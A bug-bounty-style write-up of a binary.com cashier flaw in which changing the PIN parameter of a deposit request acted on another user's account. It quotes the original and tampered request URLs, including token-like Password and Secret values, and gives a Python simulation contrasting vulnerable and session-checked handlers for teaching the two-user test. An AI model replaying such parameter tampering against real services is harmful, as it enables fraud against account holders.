Binary.com vulnerability – stealing a user's money

On November 14th, 2015, Mahmoud G. published a vulnerability in binary.com that allowed him to steal money from other users' accounts by modifying a single parameter in a request.

Mahmoud G. created two accounts in the application and logged into them in two different web browsers. Once logged in, he used the first account to deposit money through the cashier option in the application. The transaction generated this call:

<iframe src="https://cashier.binary.com/login.asp?Sportsbook=Binary (CR) SA USD&amp;PIN=CR342435&amp;Lang=en&amp;Password=0e552ae717a1d08cb147f132a31676559e3273ef&amp;Secret=1328d47abeda2b672b6424093c4dbc76&amp;Action=DEPOSIT" frameborder="0" width="100%" height="2000" id="cashiercont" scrolling="auto" style="padding:0px;margin:0px;"></iframe>

In this frame, the PIN parameter identifies the account that will receive the deposit. So, in the other browser, Mahmoud G. modified the PIN in the request so that the second account received the money instead of the first one. Note that every other parameter, including the Password and Secret values, is left unchanged: the cashier acted on whatever PIN the request carried and did not verify that it belonged to the account the session had actually authenticated as. The modified request is as follows:

<iframe src="https://cashier.binary.com/login.asp?Sportsbook=Binary (CR) SA USD&amp;PIN=<VICTIM_ACCOUNT_ID>&amp;Lang=en&amp;Password=0e552ae717a1d08cb147f132a31676559e3273ef&amp;Secret=1328d47abeda2b672b6424093c4dbc76&amp;Action=DEPOSIT" frameborder="0" width="100%" height="2000" id="cashiercont" scrolling="auto" style="padding:0px;margin:0px;"></iframe>

To identify this type of vulnerability, keep the following in mind:

  • Analyze each feature of the application using at least two users at every authorization level the application has, so that you can replay one user's requests with another user's identifiers and see whether the server still honors them.
  • Analyze all requests with an HTTP proxy and work out what each parameter does and what value the application expects for it. Pay special attention to parameters that identify a user, account, or object (such as the PIN above), since these are the ones the server must check against the authenticated session.

If you want to learn more about this bug, check out https://hackerone.com/reports/98247.
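The two-user check described above, applied to the cashier request quoted earlier, as an added example (this is not binary.com's code nor the reporter's). The cashier handlers are a deliberately simplified model of the endpoint: one that trusts the PIN from the query string, and a hardened one that takes the account from the server-side session. The second account ID, the session names, and the rule that Password and Secret are only checked for shape are assumptions made for the model; the request URL is the one shown in the text.

```python
"""Two-account authorization check modelled on the binary.com cashier request.

Added example, not binary.com's code or the reporter's. The cashier
functions are a deliberately simplified model; the request URL is the one
quoted in the text, and the second account ID is a made-up fixture.
"""
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# The first account's deposit request as quoted in the text.
ORIGINAL_URL = (
    "https://cashier.binary.com/login.asp?Sportsbook=Binary (CR) SA USD"
    "&PIN=CR342435&Lang=en&Password=0e552ae717a1d08cb147f132a31676559e3273ef"
    "&Secret=1328d47abeda2b672b6424093c4dbc76&Action=DEPOSIT"
)
ATTACKER_PIN = "CR342435"   # account the request was captured from
VICTIM_PIN = "CR000002"     # hypothetical second account (the text redacts the real one)

# Server-side session table: which account each browser session authenticated as.
SESSIONS = {"sess-attacker": ATTACKER_PIN, "sess-victim": VICTIM_PIN}


def query_params(url):
    """Flatten the query string to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query,
                                         keep_blank_values=True).items()}


def tamper(url, name, value):
    """Rebuild `url` with one query parameter changed: the edit made in the proxy."""
    parts = urlsplit(url)
    params = query_params(url)
    params[name] = value
    return urlunsplit(parts._replace(query=urlencode(params)))


def token_looks_valid(params):
    """Stand-in for the Password/Secret check (model assumption). In the report the
    same two values worked with another account's PIN, so this model, like the
    original, does not tie them to the PIN; it only checks they are hex-shaped."""
    pw, secret = params.get("Password", ""), params.get("Secret", "")
    return len(pw) == 40 and len(secret) == 32 and all(
        c in "0123456789abcdef" for c in pw + secret)


def vulnerable_cashier(url, session, amount, ledger):
    """Flawed model: the account acted on is whatever PIN the client sent."""
    p = query_params(url)
    if session not in SESSIONS or not token_looks_valid(p):
        return None
    target = p.get("PIN")
    if p.get("Action") == "DEPOSIT" and target in ledger:
        ledger[target] += amount
        return target
    return None


def fixed_cashier(url, session, amount, ledger):
    """Hardened model: the account comes from the server-side session; a PIN
    naming any other account is rejected instead of honoured."""
    p = query_params(url)
    if session not in SESSIONS or not token_looks_valid(p):
        return None
    owner = SESSIONS[session]
    if p.get("PIN") != owner:
        return None          # authorization failure: worth alerting on, not just denying
    if p.get("Action") == "DEPOSIT":
        ledger[owner] += amount
        return owner
    return None


def two_user_check(handler, amount=100):
    """Replay the captured request from the attacker's session with the other
    account's PIN. Returns (account credited or None, resulting ledger)."""
    ledger = {ATTACKER_PIN: 0, VICTIM_PIN: 0}
    tampered = tamper(ORIGINAL_URL, "PIN", VICTIM_PIN)
    credited = handler(tampered, "sess-attacker", amount, ledger)
    return credited, ledger


if __name__ == "__main__":
    for handler in (vulnerable_cashier, fixed_cashier):
        credited, ledger = two_user_check(handler)
        verdict = "VULNERABLE" if credited == VICTIM_PIN else "ok"
        print(f"{handler.__name__}: credited={credited} ledger={ledger} -> {verdict}")
```

Running it shows the first model crediting the second account from the attacker's session, while the hardened model refuses the request because the PIN does not match the account the session belongs to. The same `tamper` plus `two_user_check` shape applies to any identifier you spot in the proxy: swap in the other user's value, replay, and compare what the server did against what that session was entitled to do.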